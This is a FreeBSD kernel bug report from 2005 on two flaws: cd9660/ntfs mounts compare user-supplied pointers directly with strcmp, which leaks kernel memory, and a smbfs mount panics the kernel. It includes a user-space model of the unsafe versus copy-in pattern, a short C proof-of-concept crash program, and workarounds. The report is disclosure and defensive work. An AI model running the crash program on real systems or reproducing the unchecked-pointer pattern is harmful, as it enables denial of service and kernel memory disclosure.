kern/87010: Reading kernel memory & pagefault under non-root
Alexander Drozdov
dzal_mail at mtu-net.ru
Thu Oct 6 12:50:14 PDT 2005
>Number: 87010
>Category: kern
>Synopsis: Reading kernel memory & pagefault under non-root
>Confidential: no
>Severity: critical
>Priority: medium
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Thu Oct 06 19:50:12 GMT 2005
>Closed-Date:
>Last-Modified:
>Originator: Alexander Drozdov
>Release: 5.4-RELEASE-p6
>Organization:
>Environment:
FreeBSD sorcerer.my.domain 5.4-RELEASE-p6 FreeBSD 5.4-RELEASE-p6 #9: Thu Jul 28 09:55:49 MSD 2005 sorcerer at sorcerer.my.domain:/usr/obj/usr/src/sys/MYKERNEL_3 i386
>Description:
2 problems:
1. It is possible to pass to the kernel addresses that cannot be located
in user space. There are no write operations to these addresses, but
there are strcmp operations against some in-kernel buffers. This allows
a user to learn some information about kernel memory.
Look at /usr/src/sys/isofs/cd9660/cd9660_vfsops.c:478
cd9660_iconv->open(argp->cs_local, argp->cs_disk, &isomp->im_d2l);
cd9660_iconv->open(argp->cs_disk, argp->cs_local, &isomp->im_l2d);
The variables argp->cs_local and argp->cs_disk are pointers that the
user passed to the kernel through the mount call. The 'open' function
(/usr/src/sys/libkern/iconv.c) just uses strcmp to compare the strings
at these pointers with the charset encoding names.
The NTFS module (/usr/src/sys/fs/ntfs) has the same behaviour. msdosfs,
for example, does not: there the 'copyinstr' function is called before
the same buffers are used.
Workaround: disallow non-root users to mount filesystems (sysctl
vfs.usermount=0), OR compile the kernel without the static cd9660 and ntfs
modules and do not load these modules via kldload. I have no
information about whether this vulnerability works in a jail.
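To make the difference between the cd9660/ntfs pattern and the msdosfs pattern concrete, here is an added user-space model of it. This is illustration written for this page, not code from the PR, from FreeBSD's iconv or from any filesystem module. It simulates a tiny address space in a flat byte array, with a hypothetical sim_copyinstr() that follows copyinstr(9)'s contract (EFAULT for any byte outside the user range, ENAMETOOLONG when no NUL fits in the buffer), and compares a direct strcmp() on the caller's pointer with a strcmp() on the copied-in buffer. The ranges, table contents and all names (sim_*, unsafe_lookup, safe_lookup) are constructed assumptions.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed layout of the simulated address space (offsets into sim_mem):
 * [0, SIM_USER_BASE) stands in for kernel memory, [SIM_USER_BASE, SIM_USER_END)
 * for the caller's user space. Anything at or past SIM_USER_END is unmapped. */
#define SIM_USER_BASE 0x1000UL
#define SIM_USER_END  0x2000UL
#define SIM_MEM_SIZE  0x3000UL
#define SIM_MAXNAME   16

static unsigned char sim_mem[SIM_MEM_SIZE];

/* Toy charset table; a converter lookup by name is what the PR says
 * iconv's open() does with strcmp on the caller-supplied pointers. */
static const char *sim_charsets[] = { "iso8859-1", "koi8-r", "utf-8", NULL };

static int match_charset(const char *name)
{
    for (int i = 0; sim_charsets[i] != NULL; i++)
        if (strcmp(name, sim_charsets[i]) == 0)
            return i;
    return -1;
}

/* Pattern the PR describes for cd9660/ntfs: the pointer from the mount
 * arguments is dereferenced directly, wherever it points. No address check. */
int unsafe_lookup(unsigned long addr)
{
    return match_charset((const char *)&sim_mem[addr]);
}

/* Toy copyinstr(): copy a NUL-terminated string from a user address into a
 * kernel buffer of len bytes. Fails with EFAULT before touching any byte that
 * is outside the user range, with ENAMETOOLONG if no NUL appears within len. */
int sim_copyinstr(unsigned long uaddr, char *kbuf, size_t len, size_t *done)
{
    for (size_t i = 0; i < len; i++) {
        unsigned long a = uaddr + i;
        if (a < SIM_USER_BASE || a >= SIM_USER_END)
            return EFAULT;
        kbuf[i] = (char)sim_mem[a];
        if (kbuf[i] == '\0') {
            if (done != NULL)
                *done = i + 1;
            return 0;
        }
    }
    return ENAMETOOLONG;
}

/* Pattern the PR describes for msdosfs: copy in first, then compare only
 * the kernel-side copy. Returns a table index, or -errno on failure. */
int safe_lookup(unsigned long addr)
{
    char kbuf[SIM_MAXNAME];
    int err = sim_copyinstr(addr, kbuf, sizeof kbuf, NULL);
    if (err != 0)
        return -err;
    return match_charset(kbuf);
}

/* Constructed contents: a string that happens to equal a charset name sits in
 * the "kernel" range; a legitimate argument sits in the "user" range; one
 * user string runs off the end of user space; one has no NUL in reach. */
void sim_setup(void)
{
    memset(sim_mem, 0, sizeof sim_mem);
    strcpy((char *)&sim_mem[0x0100], "koi8-r");                /* kernel-resident */
    strcpy((char *)&sim_mem[SIM_USER_BASE + 0x10], "utf-8");   /* valid user arg */
    strcpy((char *)&sim_mem[SIM_USER_END - 3], "utf-8");       /* crosses boundary */
    memset(&sim_mem[SIM_USER_BASE + 0x100], 'A', SIM_MAXNAME); /* no NUL within len */
}

int main(void)
{
    sim_setup();
    printf("user arg     unsafe=%d safe=%d\n",
           unsafe_lookup(SIM_USER_BASE + 0x10), safe_lookup(SIM_USER_BASE + 0x10));
    printf("kernel addr  unsafe=%d safe=%d\n",
           unsafe_lookup(0x0100), safe_lookup(0x0100));
    printf("boundary     unsafe=%d safe=%d\n",
           unsafe_lookup(SIM_USER_END - 3), safe_lookup(SIM_USER_END - 3));
    printf("unterminated safe=%d\n", safe_lookup(SIM_USER_BASE + 0x100));
    return 0;
}
```

The direct-compare path returns a match for the kernel-range pointer and for the string that straddles the end of user space, which is exactly the information the PR says a caller can learn. The copy-in path rejects both with EFAULT before any comparison happens, and also bounds the read with ENAMETOOLONG, so the comparison only ever sees bytes the caller was entitled to hand over.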
2. The result of the program below is a kernel panic. I just passed a bad
but existing file descriptor (0) to the SMBFS module through a mount call.
#include <sys/param.h>
#include <sys/mount.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* smbfs mount argument block as passed to mount(2) in this report */
struct smbfs_args {
    int version;
    int dev;                        /* descriptor the module treats as its device */
    u_int flags;
    char mount_point[MAXPATHLEN];
    u_char root_path[512+1];
    uid_t uid;
    gid_t gid;
    mode_t file_mode;
    mode_t dir_mode;
    int caseopt;
};

int main(int argc, char *argv[])
{
    int ret;
    struct smbfs_args ia;

    memset(&ia, 0xff, sizeof(ia));  /* every other field left as 0xff filler */
    ia.version = 101012;
    ia.dev = 0;                     /* a bad but existing descriptor: fd 0 */
    ret = mount("smbfs", "tmp", MNT_RDONLY, &ia);
    if (!ret)
        printf("Ok!\n");
    else
        printf("result = %i, errno = %i, %s\n", ret, errno,
               strerror(errno));
    return 0;
}
Workaround: disallow non-root users to mount filesystems (sysctl
vfs.usermount=0), OR compile the kernel without the static smbfs module
and do not load this module via kldload. I have no information
about whether this vulnerability works in a jail.
>How-To-Repeat:
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted: